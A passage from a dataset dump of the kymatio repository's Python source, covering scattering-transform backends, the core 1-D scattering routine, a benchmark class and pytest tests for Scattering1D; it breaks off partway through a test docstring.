"text": "import torch\nimport kymatio.scattering2d.backend as backend\nfrom kymatio import Scattering2D\n\nclass BenchmarkScattering2D:\n params = [\n [\n { # MNIST-like. 32x32, 2 scales, 8 orientations\n \"J\": 2,\n \"shape\": (32, 32),\n \"L\": 8,\n },\n { # ImageNet-like. 224x224, 3 scales, 8 orientations\n \"J\": 3,\n \"shape\": (224, 224),\n \"L\": 8,\n },\n { # A case with many scales (J=7) and few orientations (L=2)\n \"J\": 7,\n \"shape\": (224, 224),\n \"L\": 2,\n },\n ],\n [\n 32,\n ]\n ]\n param_names = [\"sc_params\", \"batch_size\"]\n\n def setup(self, sc_params, batch_size):\n n_channels = 1\n scattering = Scattering2D(**sc_params)\n scattering.cpu()\n x = torch.randn(\n batch_size,\n n_channels,\n sc_params[\"shape\"][0], sc_params[\"shape\"][1],\n dtype=torch.float32)\n x.cpu()\n self.scattering = scattering\n self.x = x\n\n def time_constructor(self, sc_params, batch_size):\n Scattering2D(**sc_params)\n\n def time_forward(self, sc_params, batch_size):\n (self.scattering).forward(self.x)\n"
},
{
"alpha_fraction": 0.5396155714988708,
"alphanum_fraction": 0.5457102656364441,
"avg_line_length": 23.802326202392578,
"blob_id": "061d2cd36795747f494f451eb6e5fc7e0837471c",
"content_id": "af08e3edc95716fc8cfee5b8b97563dd97819eb6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2133,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 86,
"path": "/kymatio/backend/numpy_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\ndef input_checks(x):\n if x is None:\n raise TypeError('The input should be not empty.')\n\n\ndef modulus(x):\n \"\"\"\n This function implements a modulus transform for complex numbers.\n\n Usage\n -----\n x_mod = modulus(x)\n\n Parameters\n ---------\n x: input complex tensor.\n\n Returns\n -------\n output: a real tensor equal to the modulus of x.\n\n \"\"\"\n return np.abs(x)\n\n\ndef _is_complex(x):\n return (x.dtype == np.complex64) or (x.dtype == np.complex128)\n\n\ndef _is_real(x):\n return (x.dtype == np.float32) or (x.dtype == np.float64)\n\n\ndef cdgmm(A, B, inplace=False):\n \"\"\"\n Complex pointwise multiplication between (batched) tensor A and tensor B.\n\n Parameters\n ----------\n A : tensor\n A is a complex tensor of size (B, C, M, N, 2)\n B : tensor\n B is a complex tensor of size (M, N) or real tensor of (M, N)\n inplace : boolean, optional\n if set to True, all the operations are performed inplace\n\n Returns\n -------\n C : tensor\n output tensor of size (B, C, M, N, 2) such that:\n C[b, c, m, n, :] = A[b, c, m, n, :] * B[m, n, :]\n\n \"\"\"\n\n if not _is_complex(A):\n raise TypeError('The first input must be complex.')\n\n if A.shape[-len(B.shape):] != B.shape[:]:\n raise RuntimeError('The inputs are not compatible for '\n 'multiplication.')\n\n if not _is_complex(B) and not _is_real(B):\n raise TypeError('The second input must be complex or real.')\n\n if inplace:\n return np.multiply(A, B, out=A)\n else:\n return A * B\n\n\ndef real(x):\n \"\"\"Real part of complex tensor\n Takes the real part of a complex tensor, where the last axis corresponds\n to the real and imaginary parts.\n Parameters\n ----------\n x : tensor\n A complex tensor (that is, whose last dimension is equal to 2).\n Returns\n -------\n x_real : tensor\n The tensor x[..., 0] which is interpreted as the real part of x.\n \"\"\"\n return np.real(x)\n"
},
{
"alpha_fraction": 0.6290697455406189,
"alphanum_fraction": 0.637403130531311,
"avg_line_length": 32.07692337036133,
"blob_id": "cfb0bc4719a959ee8dd9f90da865de9508683019",
"content_id": "5f2bc8910efd5aee4ac48d76fbd1ddcea3a787d6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5160,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 156,
"path": "/kymatio/scattering1d/backend/torch_backend.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Edouard Oyallon, Joakim Anden, Mathieu Andreux\n\nimport torch\nimport torch.nn.functional as F\n\nfrom collections import namedtuple\nfrom packaging import version\n\nBACKEND_NAME = 'torch'\n\nfrom ...backend.torch_backend import _is_complex, Modulus, concatenate, type_checks, cdgmm, real\nfrom ...backend.base_backend import FFT\n\ndef subsample_fourier(x, k):\n \"\"\"Subsampling in the Fourier domain\n\n Subsampling in the temporal domain amounts to periodization in the Fourier\n domain, so the input is periodized according to the subsampling factor.\n\n Parameters\n ----------\n x : tensor\n Input tensor with at least 3 dimensions, where the next to last\n corresponds to the frequency index in the standard PyTorch FFT\n ordering. The length of this dimension should be a power of 2 to\n avoid errors. The last dimension should represent the real and\n imaginary parts of the Fourier transform.\n k : int\n The subsampling factor.\n\n Returns\n -------\n res : tensor\n The input tensor periodized along the next to last axis to yield a\n tensor of size x.shape[-2] // k along that dimension.\n \"\"\"\n if not _is_complex(x):\n raise TypeError('The input should be complex.')\n\n N = x.shape[-2]\n res = x.view(x.shape[:-2] + (k, N // k, 2)).mean(dim=-3)\n return res\n\ndef pad_1d(x, pad_left, pad_right, mode='constant', value=0.):\n \"\"\"Pad real 1D tensors\n\n 1D implementation of the padding function for real PyTorch tensors.\n\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n mode : string, optional\n Padding mode. Options include 'constant' and 'reflect'. See the\n PyTorch API for other options. Defaults to 'constant'.\n value : float, optional\n If mode == 'constant', value to input within the padding. Defaults to\n 0.\n\n Returns\n -------\n res : tensor\n The tensor passed along the third dimension.\n \"\"\"\n if (pad_left >= x.shape[-1]) or (pad_right >= x.shape[-1]):\n if mode == 'reflect':\n raise ValueError('Indefinite padding size (larger than tensor).')\n res = F.pad(x.unsqueeze(2),\n (pad_left, pad_right, 0, 0),\n mode=mode, value=value).squeeze(2)\n return res\n\ndef pad(x, pad_left=0, pad_right=0, to_complex=True):\n \"\"\"Pad real 1D tensors and map to complex\n\n Padding which allows to simultaneously pad in a reflection fashion and map\n to complex if necessary.\n\n Parameters\n ----------\n x : tensor\n Three-dimensional input tensor with the third axis being the one to\n be padded.\n pad_left : int\n Amount to add on the left of the tensor (at the beginning of the\n temporal axis).\n pad_right : int\n amount to add on the right of the tensor (at the end of the temporal\n axis).\n to_complex : boolean, optional\n Whether to map the resulting padded tensor to a complex type (seen\n as a real number). 
Defaults to True.\n\n Returns\n -------\n output : tensor\n A padded signal, possibly transformed into a four-dimensional tensor\n with the last axis of size 2 if to_complex is True (this axis\n corresponds to the real and imaginary parts).\n \"\"\"\n output = pad_1d(x, pad_left, pad_right, mode='reflect')\n if to_complex:\n output = torch.stack((output, torch.zeros_like(output)), dim=-1)\n return output\n\ndef unpad(x, i0, i1):\n \"\"\"Unpad real 1D tensor\n\n Slices the input tensor at indices between i0 and i1 along the last axis.\n\n Parameters\n ----------\n x : tensor\n Input tensor with least one axis.\n i0 : int\n Start of original signal before padding.\n i1 : int\n End of original signal before padding.\n\n Returns\n -------\n x_unpadded : tensor\n The tensor x[..., i0:i1].\n \"\"\"\n return x[..., i0:i1]\n\nif version.parse(torch.__version__) >= version.parse('1.8'):\n fft = FFT(lambda x: torch.view_as_real(torch.fft.fft(torch.view_as_complex(x))),\n lambda x: torch.view_as_real(torch.fft.ifft(torch.view_as_complex(x))),\n lambda x: torch.fft.ifft(torch.view_as_complex(x)).real, type_checks)\nelse:\n fft = FFT(lambda x: torch.fft(x, 1, normalized=False),\n lambda x: torch.ifft(x, 1, normalized=False),\n lambda x: torch.irfft(x, 1, normalized=False, onesided=False),\n type_checks)\n\n\nbackend = namedtuple('backend', ['name', 'modulus_complex', 'subsample_fourier', 'real', 'unpad', 'fft', 'concatenate'])\nbackend.name = 'torch'\nbackend.version = torch.__version__\nbackend.modulus_complex = Modulus()\nbackend.subsample_fourier = subsample_fourier\nbackend.real = real\nbackend.unpad = unpad\nbackend.cdgmm = cdgmm\nbackend.pad = pad\nbackend.pad_1d = pad_1d\nbackend.fft = fft\nbackend.concatenate = lambda x: concatenate(x, -2)\n"
},
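The `pad`/`unpad` pair in the 1-D backend above relies on reflection padding whose edge sample is not duplicated. A small self-contained sketch of the round trip, using NumPy's `np.pad` as a stand-in for the torch implementation:

```python
import numpy as np

def pad_reflect(x, pad_left, pad_right):
    # Reflect-pad the last axis; the edge sample itself is not repeated.
    widths = [(0, 0)] * (x.ndim - 1) + [(pad_left, pad_right)]
    return np.pad(x, widths, mode='reflect')

x = np.arange(8.0)[None, :]               # one signal of length 8
xp = pad_reflect(x, 3, 3)

assert xp.shape == (1, 14)
assert np.allclose(xp[..., 3:3 + 8], x)   # "unpad" recovers the original support
assert xp[0, 2] == x[0, 1]                # left padding mirrors around x[..., 0]
```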
{
"alpha_fraction": 0.49189919233322144,
"alphanum_fraction": 0.5220522284507751,
"avg_line_length": 34.45744705200195,
"blob_id": "ea2c36cff65ccf342a00c7d7014b483e6eb3112f",
"content_id": "c3a6c629f651223c8be9436d0af568f84c792fb8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6666,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 188,
"path": "/kymatio/scattering1d/core/scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "# Authors: Mathieu Andreux, Joakim Anden, Edouard Oyallon\n# Scientific Ancestry: Joakim Anden, Mathieu Andreux, Vincent Lostanlen\n\n\ndef scattering1d(x, pad, unpad, backend, J, psi1, psi2, phi, pad_left=0,\n pad_right=0, ind_start=None, ind_end=None, oversampling=0,\n max_order=2, average=True, size_scattering=(0, 0, 0),\n vectorize=False, out_type='array'):\n \"\"\"\n Main function implementing the 1-D scattering transform.\n\n Parameters\n ----------\n x : Tensor\n a torch Tensor of size `(B, 1, T)` where `T` is the temporal size\n psi1 : dictionary\n a dictionary of filters (in the Fourier domain), with keys (`j`, `q`).\n `j` corresponds to the downsampling factor for\n :math:`x \\\\ast psi1[(j, q)]``, and `q` corresponds to a pitch class\n (chroma).\n * psi1[(j, n)] is itself a dictionary, with keys corresponding to the\n dilation factors: psi1[(j, n)][j2] corresponds to a support of size\n :math:`2^{J_\\\\text{max} - j_2}`, where :math:`J_\\\\text{max}` has been\n defined a priori (`J_max = size` of the padding support of the input)\n * psi1[(j, n)] only has real values;\n the tensors are complex so that broadcasting applies\n psi2 : dictionary\n a dictionary of filters, with keys (j2, n2). Same remarks as for psi1\n phi : dictionary\n a dictionary of filters of scale :math:`2^J` with keys (`j`)\n where :math:`2^j` is the downsampling factor.\n The array `phi[j]` is a real-valued filter.\n J : int\n scale of the scattering\n pad_left : int, optional\n how much to pad the signal on the left. Defaults to `0`\n pad_right : int, optional\n how much to pad the signal on the right. Defaults to `0`\n ind_start : dictionary of ints, optional\n indices to truncate the signal to recover only the\n parts which correspond to the actual signal after padding and\n downsampling. Defaults to None\n ind_end : dictionary of ints, optional\n See description of ind_start\n oversampling : int, optional\n how much to oversample the scattering (with respect to :math:`2^J`):\n the higher, the larger the resulting scattering\n tensor along time. Defaults to `0`\n order2 : boolean, optional\n Whether to compute the 2nd order or not. Defaults to `False`.\n average_U1 : boolean, optional\n whether to average the first order vector. Defaults to `True`\n size_scattering : tuple\n Contains the number of channels of the scattering, precomputed for\n speed-up. Defaults to `(0, 0, 0)`.\n vectorize : boolean, optional\n whether to return a dictionary or a tensor. 
Defaults to False.\n\n \"\"\"\n subsample_fourier = backend.subsample_fourier\n modulus_complex = backend.modulus_complex\n real = backend.real\n fft = backend.fft\n cdgmm = backend.cdgmm\n concatenate = backend.concatenate\n\n\n # S is simply a dictionary if we do not perform the averaging...\n batch_size = x.shape[0]\n kJ = max(J - oversampling, 0)\n temporal_size = ind_end[kJ] - ind_start[kJ]\n out_S_0, out_S_1, out_S_2 = [], [], []\n\n # pad to a dyadic size and make it complex\n U_0 = pad(x, pad_left=pad_left, pad_right=pad_right)\n\n # compute the Fourier transform\n U_0_hat = fft(U_0, 'C2C')\n\n # Get S0\n k0 = max(J - oversampling, 0)\n\n if average:\n S_0_c = cdgmm(U_0_hat, phi[0])\n S_0_hat = subsample_fourier(S_0_c, 2**k0)\n S_0_r = fft(S_0_hat, 'C2R', inverse=True)\n\n S_0 = unpad(S_0_r, ind_start[k0], ind_end[k0])\n else:\n S_0 = x\n\n out_S_0.append({'coef': S_0,\n 'j': (),\n 'n': ()})\n\n # First order:\n for n1 in range(len(psi1)):\n # Convolution + downsampling\n j1 = psi1[n1]['j']\n\n k1 = max(j1 - oversampling, 0)\n\n assert psi1[n1]['xi'] < 0.5 / (2**k1)\n\n U_1_c = cdgmm(U_0_hat, psi1[n1][0])\n U_1_hat = subsample_fourier(U_1_c, 2**k1)\n U_1_c = fft(U_1_hat, 'C2C', inverse=True)\n\n # Take the modulus\n U_1_m = modulus_complex(U_1_c)\n\n if average or max_order > 1:\n U_1_hat = fft(U_1_m, 'C2C')\n\n if average:\n # Convolve with phi_J\n k1_J = max(J - k1 - oversampling, 0)\n\n S_1_c = cdgmm(U_1_hat, phi[k1])\n S_1_hat = subsample_fourier(S_1_c, 2**k1_J)\n S_1_r = fft(S_1_hat, 'C2R', inverse=True)\n\n S_1 = unpad(S_1_r, ind_start[k1_J + k1], ind_end[k1_J + k1])\n else:\n # just take the real value and unpad\n U_1_r = real(U_1_m)\n\n S_1 = unpad(U_1_r, ind_start[k1], ind_end[k1])\n\n out_S_1.append({'coef': S_1,\n 'j': (j1,),\n 'n': (n1,)})\n\n if max_order == 2:\n # 2nd order\n for n2 in range(len(psi2)):\n j2 = psi2[n2]['j']\n\n if j2 > j1:\n assert psi2[n2]['xi'] < psi1[n1]['xi']\n\n # convolution + downsampling\n k2 = max(j2 - k1 - oversampling, 0)\n\n U_2_c = cdgmm(U_1_hat, psi2[n2][k1])\n U_2_hat = subsample_fourier(U_2_c, 2**k2)\n # take the modulus\n U_2_c = fft(U_2_hat, 'C2C', inverse=True)\n\n U_2_m = modulus_complex(U_2_c)\n\n if average:\n U_2_hat = fft(U_2_m, 'C2C')\n\n # Convolve with phi_J\n k2_J = max(J - k2 - k1 - oversampling, 0)\n\n S_2_c = cdgmm(U_2_hat, phi[k1 + k2])\n S_2_hat = subsample_fourier(S_2_c, 2**k2_J)\n S_2_r = fft(S_2_hat, 'C2R', inverse=True)\n\n S_2 = unpad(S_2_r, ind_start[k1 + k2 + k2_J], ind_end[k1 + k2 + k2_J])\n else:\n # just take the real value and unpad\n U_2_r = real(U_2_m)\n S_2 = unpad(U_2_r, ind_start[k1 + k2], ind_end[k1 + k2])\n\n out_S_2.append({'coef': S_2,\n 'j': (j1, j2),\n 'n': (n1, n2)})\n\n out_S = []\n out_S.extend(out_S_0)\n out_S.extend(out_S_1)\n out_S.extend(out_S_2)\n\n if out_type == 'array' and vectorize:\n out_S = concatenate([x['coef'] for x in out_S])\n elif out_type == 'array' and not vectorize:\n out_S = {x['n']: x['coef'] for x in out_S}\n elif out_type == 'list':\n # NOTE: This overrides the vectorize flag.\n for x in out_S:\n x.pop('n')\n\n return out_S\n\n__all__ = ['scattering1d']\n"
},
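The core routine above organizes each scattering order as: multiply by a filter in Fourier, subsample by periodization, take a modulus, then smooth with the low-pass phi. The toy first-order pass below illustrates those steps; the Gaussian filters and all names here are stand-ins, not the library's actual wavelets or API.

```python
import numpy as np

T, J = 1024, 4
f = np.fft.fftfreq(T)                             # frequencies in cycles/sample
phi_f = np.exp(-0.5 * (f * 2.0 ** J) ** 2)        # toy low-pass at scale 2^J
psi_f = np.exp(-0.5 * ((f - 0.25) / 0.05) ** 2)   # toy band-pass near xi = 0.25

x = np.random.randn(T)
U1 = np.abs(np.fft.ifft(np.fft.fft(x) * psi_f))   # U1 = |x * psi|
S1_f = np.fft.fft(U1) * phi_f                     # smooth with phi

k = 2 ** J                                        # subsample by periodization
S1 = np.fft.ifft(S1_f.reshape(k, T // k).mean(axis=0)).real
print(S1.shape)                                   # (64,)
```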
{
"alpha_fraction": 0.5609991550445557,
"alphanum_fraction": 0.580366849899292,
"avg_line_length": 31.245136260986328,
"blob_id": "a00708b781387cb75ba3b4407a1e69dcfc55a4d7",
"content_id": "1c9636f8389b2bf087753a13d42e978cd22ab744",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16574,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 514,
"path": "/tests/scattering1d/test_torch_scattering1d.py",
"repo_name": "changhongw/kymatio",
"src_encoding": "UTF-8",
"text": "import pytest\nimport torch\nfrom kymatio import Scattering1D\nimport math\nimport os\nimport io\nimport numpy as np\n\n\nbackends = []\nskcuda_available = False\ntry:\n if torch.cuda.is_available():\n from skcuda import cublas\n import cupy\n skcuda_available = True\nexcept:\n Warning('torch_skcuda backend not available.')\n\nif skcuda_available:\n from kymatio.scattering1d.backend.torch_skcuda_backend import backend\n backends.append(backend)\n\nfrom kymatio.scattering1d.backend.torch_backend import backend\nbackends.append(backend)\n\n\nif torch.cuda.is_available():\n devices = ['cuda', 'cpu']\nelse:\n devices = ['cpu']\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_simple_scatterings(device, backend, random_state=42):\n \"\"\"\n Checks the behaviour of the scattering on simple signals\n (zero, constant, pure cosine)\n \"\"\"\n\n rng = np.random.RandomState(random_state)\n J = 6\n Q = 8\n T = 2**9\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='torch').to(device)\n return\n\n # zero signal\n x0 = torch.zeros(2, T).to(device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n s = scattering(x0)\n assert \"CPU\" in ve.value.args[0]\n return\n s = scattering(x0)\n\n # check that s is zero!\n assert torch.max(torch.abs(s)) < 1e-7\n\n # constant signal\n x1 = rng.randn(1)[0] * torch.ones(1, T).to(device)\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n s1 = scattering(x1)\n\n # check that all orders above 1 are 0\n assert torch.max(torch.abs(s1[:, 1:])) < 1e-7\n\n # sinusoid scattering\n meta = scattering.meta()\n for _ in range(3):\n k = rng.randint(1, T // 2, 1)[0]\n x2 = torch.cos(2 * math.pi * float(k) * torch.arange(0, T, dtype=torch.float32) / float(T))\n x2 = x2.unsqueeze(0).to(device)\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n s2 = scattering(x2)\n\n assert(s2[:,torch.from_numpy(meta['order']) != 1,:].abs().max() < 1e-2)\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_sample_scattering(device, backend):\n \"\"\"\n Applies scattering on a stored signal to make sure its output agrees with\n a previously calculated version.\n \"\"\"\n test_data_dir = os.path.dirname(__file__)\n\n with open(os.path.join(test_data_dir, 'test_data_1d.npz'), 'rb') as f:\n buffer = io.BytesIO(f.read())\n data = np.load(buffer)\n\n\n x = torch.from_numpy(data['x']).to(device)\n J = data['J']\n Q = data['Q']\n Sx0 = torch.from_numpy(data['Sx']).to(device)\n\n T = x.shape[-1]\n\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='torch').to(device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n Sx = scattering(x)\n assert \"CPU\" in ve.value.args[0]\n return\n\n Sx = scattering(x)\n assert torch.allclose(Sx, Sx0)\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_computation_Ux(backend, device, random_state=42):\n \"\"\"\n Checks the computation of the U transform (no averaging for 1st order)\n \"\"\"\n rng = np.random.RandomState(random_state)\n J = 6\n Q = 8\n T = 2**12\n scattering = Scattering1D(J, T, Q, average=False,\n max_order=1, vectorize=False, frontend='torch', backend=backend).to(device)\n # random signal\n x = torch.from_numpy(rng.randn(1, T)).float().to(device)\n\n if not backend.name.endswith('skcuda') or device != 'cpu':\n s = scattering(x)\n\n # check that the keys in s correspond to the 
order 0 and second order\n for k in range(len(scattering.psi1_f)):\n assert (k,) in s.keys()\n for k in s.keys():\n if k is not ():\n assert k[0] < len(scattering.psi1_f)\n else:\n assert True\n\n scattering.max_order = 2\n\n s = scattering(x)\n\n count = 1\n for k1, filt1 in enumerate(scattering.psi1_f):\n assert (k1,) in s.keys()\n count += 1\n for k2, filt2 in enumerate(scattering.psi2_f):\n if filt2['j'] > filt1['j']:\n assert (k1, k2) in s.keys()\n count += 1\n\n assert count == len(s)\n\n with pytest.raises(ValueError) as ve:\n scattering.vectorize = True\n scattering(x)\n assert \"mutually incompatible\" in ve.value.args[0]\n\n\n# Technical tests\[email protected](\"backend\", backends)\ndef test_scattering_GPU_CPU(backend, random_state=42):\n \"\"\"\n This function tests whether the CPU computations are equivalent to\n the GPU ones\n \"\"\"\n if torch.cuda.is_available() and not backend.name.endswith('_skcuda'):\n torch.manual_seed(random_state)\n\n J = 6\n Q = 8\n T = 2**12\n\n # build the scattering\n scattering = Scattering1D(J, T, Q, backend=backend, frontend='torch').cpu()\n\n x = torch.randn(2, T)\n s_cpu = scattering(x)\n\n scattering = scattering.cuda()\n x_gpu = x.clone().cuda()\n s_gpu = scattering(x_gpu).cpu()\n # compute the distance\n\n Warning('Tolerance has been slightly lowered here...')\n assert torch.allclose(s_cpu, s_gpu, atol=1e-7)\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_coordinates(device, backend, random_state=42):\n \"\"\"\n Tests whether the coordinates correspond to the actual values (obtained\n with Scattering1d.meta()), and with the vectorization\n \"\"\"\n\n torch.manual_seed(random_state)\n J = 6\n Q = 8\n T = 2**12\n\n scattering = Scattering1D(J, T, Q, max_order=2, backend=backend, frontend='torch')\n\n x = torch.randn(2, T)\n\n scattering.to(device)\n x = x.to(device)\n\n for max_order in [1, 2]:\n scattering.max_order = max_order\n\n scattering.vectorize = False\n\n if backend.name.endswith('skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n s_dico = scattering(x)\n assert \"CPU\" in ve.value.args[0]\n else:\n s_dico = scattering(x)\n s_dico = {k: s_dico[k].data for k in s_dico.keys()}\n scattering.vectorize = True\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n s_vec = scattering(x)\n assert \"CPU\" in ve.value.args[0]\n else:\n s_vec = scattering(x)\n s_dico = {k: s_dico[k].cpu() for k in s_dico.keys()}\n s_vec = s_vec.cpu()\n\n meta = scattering.meta()\n\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n assert len(s_dico) == s_vec.shape[1]\n\n for cc in range(s_vec.shape[1]):\n k = meta['key'][cc]\n assert torch.allclose(s_vec[:, cc], torch.squeeze(s_dico[k]))\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_precompute_size_scattering(device, backend, random_state=42):\n \"\"\"\n Tests that precompute_size_scattering computes a size which corresponds\n to the actual scattering computed\n \"\"\"\n torch.manual_seed(random_state)\n\n J = 6\n Q = 8\n T = 2**12\n\n scattering = Scattering1D(J, T, Q, vectorize=False, backend=backend, frontend='torch')\n\n x = torch.randn(2, T)\n\n scattering.to(device)\n x = x.to(device)\n if not backend.name.endswith('_skcuda') or device != 'cpu':\n for max_order in [1, 2]:\n scattering.max_order = max_order\n s_dico = scattering(x)\n for detail in [True, False]:\n # get the size of scattering\n size = 
scattering.output_size(detail=detail)\n if detail:\n num_orders = {0: 0, 1: 0, 2: 0}\n for k in s_dico.keys():\n if k is ():\n num_orders[0] += 1\n else:\n if len(k) == 1: # order1\n num_orders[1] += 1\n elif len(k) == 2:\n num_orders[2] += 1\n todo = 2 if max_order == 2 else 1\n for i in range(todo):\n assert num_orders[i] == size[i]\n # check that the orders are completely equal\n else:\n assert len(s_dico) == size\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_differentiability_scattering(device, backend, random_state=42):\n \"\"\"\n It simply tests whether it is really differentiable or not.\n This does NOT test whether the gradients are correct.\n \"\"\"\n\n if backend.name.endswith(\"_skcuda\"):\n pytest.skip(\"The skcuda backend does not pass differentiability\"\n \"tests, but that's ok (for now).\")\n\n torch.manual_seed(random_state)\n\n J = 6\n Q = 8\n T = 2**12\n\n scattering = Scattering1D(J, T, Q, frontend='torch', backend=backend).to(device)\n\n x = torch.randn(2, T, requires_grad=True, device=device)\n\n s = scattering.forward(x)\n loss = torch.sum(torch.abs(s))\n loss.backward()\n assert torch.max(torch.abs(x.grad)) > 0.\n\n\[email protected](\"backend\", backends)\ndef test_scattering_shape_input(backend):\n # Checks that a wrong input to shape raises an error\n J, Q = 6, 8\n with pytest.raises(ValueError) as ve:\n shape = 5, 6\n s = Scattering1D(J, shape, Q, backend=backend, frontend='torch')\n assert \"exactly one element\" in ve.value.args[0]\n\n\n with pytest.raises(ValueError) as ve:\n shape = 1.5\n s = Scattering1D(J, shape, Q, backend=backend, frontend='torch')\n # should invoke the else branch\n assert \"1-tuple\" in ve.value.args[0]\n assert \"integer\" in ve.value.args[0]\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_batch_shape_agnostic(device, backend):\n J, Q = 3, 8\n length = 1024\n shape = (length,)\n\n length_ds = length / 2**J\n\n S = Scattering1D(J, shape, Q, backend=backend, frontend='torch').to(device)\n\n with pytest.raises(ValueError) as ve:\n S(torch.zeros(()).to(device))\n assert \"at least one axis\" in ve.value.args[0]\n\n x = torch.zeros(shape).to(device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n with pytest.raises(TypeError) as ve:\n Sx = S(x)\n assert \"CPU\" in ve.value.args[0]\n return\n\n Sx = S(x)\n\n assert Sx.dim() == 2\n assert Sx.shape[-1] == length_ds\n\n n_coeffs = Sx.shape[-2]\n\n test_shapes = ((1,) + shape, (2,) + shape, (2,2) + shape, (2,2,2) + shape)\n\n for test_shape in test_shapes:\n x = torch.zeros(test_shape).to(device)\n\n S.vectorize = True\n Sx = S(x)\n\n assert Sx.dim() == len(test_shape)+1\n assert Sx.shape[-1] == length_ds\n assert Sx.shape[-2] == n_coeffs\n assert Sx.shape[:-2] == test_shape[:-1]\n\n S.vectorize = False\n Sx = S(x)\n\n assert len(Sx) == n_coeffs\n for k, v in Sx.items():\n assert v.shape[-1] == length_ds\n assert v.shape[-2] == 1\n assert v.shape[:-2] == test_shape[:-1]\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_pad_1d(device, backend, random_state=42):\n \"\"\"\n Tests the correctness and differentiability of pad_1d\n \"\"\"\n torch.manual_seed(random_state)\n N = 128\n for pad_left in range(0, N - 16, 16):\n for pad_right in [pad_left, pad_left + 16]:\n x = torch.randn(2, 4, N, requires_grad=True, device=device)\n x_pad = backend.pad_1d(x, pad_left, pad_right, mode='reflect')\n # Check the size\n x2 = x.clone()\n x_pad2 = 
x_pad.clone()\n for t in range(1, pad_left + 1):\n assert torch.allclose(x_pad2[..., pad_left - t],x2[..., t])\n for t in range(x2.shape[-1]):\n assert torch.allclose(x_pad2[..., pad_left + t], x2[..., t])\n for t in range(1, pad_right + 1):\n assert torch.allclose(x_pad2[..., x_pad.shape[-1] - 1 - pad_right + t], x2[..., x.shape[-1] - 1 - t])\n # check the differentiability\n loss = 0.5 * torch.sum(x_pad**2)\n loss.backward()\n # compute the theoretical gradient for x\n x_grad_original = x.clone()\n x_grad = x_grad_original.new(x_grad_original.shape).fill_(0.)\n x_grad += x_grad_original\n for t in range(1, pad_left + 1):\n x_grad[..., t] += x_grad_original[..., t]\n for t in range(1, pad_right + 1): # it is counted twice!\n t0 = x.shape[-1] - 1 - t\n x_grad[..., t0] += x_grad_original[..., t0]\n # get the difference\n assert torch.allclose(x.grad, x_grad)\n # Check that the padding shows an error if we try to pad\n with pytest.raises(ValueError):\n backend.pad_1d(x, x.shape[-1], 0, mode='reflect')\n with pytest.raises(ValueError):\n backend.pad_1d(x, 0, x.shape[-1], mode='reflect')\n\n\[email protected](\"device\", devices)\[email protected](\"backend\", backends)\ndef test_modulus(device, backend, random_state=42):\n \"\"\"\n Tests the stability and differentiability of modulus\n \"\"\"\n torch.manual_seed(random_state)\n # Test with a random vector\n x = torch.randn(2, 4, 128, 2, requires_grad=True, device=device)\n\n if backend.name.endswith('_skcuda') and device == 'cpu':\n # If we are using a GPU-only backend, make sure it raises the proper\n # errors for CPU tensors.\n with pytest.raises(TypeError) as re:\n x_bad = torch.randn((4, 2)).cpu()\n backend.modulus_complex(x_bad)\n assert \"for CPU tensors\" in re.value.args[0]\n return\n\n\n x_abs = backend.modulus_complex(x)\n\n assert len(x_abs.shape) == len(x.shape)\n # check the value\n x_abs2 = x_abs.clone()\n x2 = x.clone()\n assert torch.allclose(x_abs2[..., 0], torch.sqrt(x2[..., 0]**2 + x2[..., 1]**2))\n\n with pytest.raises(TypeError) as te:\n x_bad = torch.randn(4).to(device)\n backend.modulus_complex(x_bad)\n assert \"should be complex\" in te.value.args[0]\n\n if backend.name.endswith(\"_skcuda\"):\n pytest.skip(\"The skcuda backend does not pass differentiability\"\n \"tests, but that's ok (for now).\")\n\n # check the gradient\n loss = torch.sum(x_abs)\n loss.backward()\n x_grad = x2 / x_abs2[..., 0].unsqueeze(dim=-1)\n assert torch.allclose(x.grad, x_grad)\n\n\n # Test the differentiation with a vector made of zeros\n x0 = torch.zeros(100, 4, 128, 2, requires_grad=True, device=device)\n x_abs0 = backend.modulus_complex(x0)\n loss0 = torch.sum(x_abs0)\n loss0.backward()\n assert torch.max(torch.abs(x0.grad)) <= 1e-7\n\n\[email protected](\"backend\", backends)\[email protected](\"device\", devices)\ndef test_subsample_fourier(backend, device, random_state=42):\n \"\"\"\n Tests whether the periodization in 